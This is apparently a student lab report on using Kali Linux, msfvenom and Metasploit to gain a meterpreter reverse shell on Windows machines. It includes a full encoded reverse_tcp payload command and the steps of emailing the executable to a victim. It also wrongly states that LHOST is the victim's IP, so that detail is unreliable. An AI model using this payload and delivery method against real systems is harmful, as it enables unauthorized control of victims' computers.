Kali Linux Metasploit Exploit for Windows Ethical Hacking

Verified

Added on 2023/06/05

AI Summary

This report outlines a practical workshop exercise focused on exploiting Windows operating systems (XP, 7, 8, 8.1, and 10) using Kali Linux and the Metasploit framework. The objective was to demonstrate how an attacker could gain unauthorized access and control over a victim's machine. The setup involved two machines on the same NAT network: one running Kali Linux with Metasploit installed, and another running Windows without antivirus software. The process included creating an executable file on the Kali Linux platform, tailored to the target Windows machine's IP address and PORT number, using the 'msfvenom' command. This file was then sent to the target machine. Upon execution of the file on the Windows machine, the Metasploit framework, set in listening mode, established a 'meterpreter' session, granting the attacker full control over the compromised system, enabling actions such as file manipulation, directory navigation, and data exfiltration.

Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

ICT ETHICAL HACKING (EXPLOITS) 2
In the workshop, we came up with Kali Linux Metasploit exploit whose target would
mainly be on the windows operating systems (windows XP, 7, 8, 8.1 and 10). This exploit would
enable an attacker get into the victim’s machine and do a number of operations just as if logged
in. metasploit is basically a project that helps in penetration testing and development of ID
signatures. The tool helps in the development of an exploit code as well as its execution in a
targeted remote machine (Dieterle, 2016).
For this test our requirements were; a metasploit framework with the entire Ruby
packages which we installed in a Kali Linux Operating system computer, two machines, one
with a windows operating system and another with a Kali Linux OS. The two machines were
allowed to operate in the same NAT network. Because an antivirus would prevent the attack, we
ensured that the target machine did not have any antivirus software (Holik, Horalek, Marik,
Neradova & Zitta, 2014, p.240). The Metasploit command which we used throughout our
penetration test was the Msfconsole simply because of its flexibility and other additional features
which supported the tools within the framework.
For us to be in a position to penetrate into the second machine which was operating on a
windows platform, we first had to be aware of the machine’s IP address and one of its free PORT
numbers which we easily acquired considering that the two machines were operating in the same
network. An IP address of a machine operating within the same network can be obtained easily
using software called Netcut (Muniz, 2013).
Now to get a chance of penetrating into the second machine, we first of all created an executable
file within the Kali Linux platform under the IP address and PORT number specification of the
second machine using the command “msfvenom –p windows/meterpreter/reverse_tcp LHOST=

ICT ETHICAL HACKING (EXPLOITS) 3
(IP address of windows machine) LPORT= (PORT in the windows machine) –f exe –e
x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”
The command allowed us to create an executable folder in the Kali Linux platform and
which contained several .exe files. This is the collection of files which we were supposed to send
to the target machine through channels line mail or else through the network (Pritchett & De
Smet, 2013).
After we send the file to the target machine, we were entitled to activate our metasploit
framework into a listening status using the “exploit” command at the Msfconsole handler status.
So, when it’s set on a listening mode, it waits until the file send to the victim machine is opened.
When the file sent to the victim machine is eventually opened by the victim, on the side of Kali
Linux platform “meterpreter” activates itself automatically.
At this juncture, the attacker is inside the victim’s machine and can carry out several
operations with full control just like a person who has logged into the system physically. Some
of the activities the attacker can do on the victim’s machine include reading the contents of the
files on the screen, changing directories, editing files, deleting files, searching for files,
uploading files changing local directories, printing local directories, removing directories,
moving source to destination, and printing working directories (Weidman, 2014). This implies
that the attacker has already hacked into the victim’s computer.
References
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.

ICT ETHICAL HACKING (EXPLOITS) 4
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.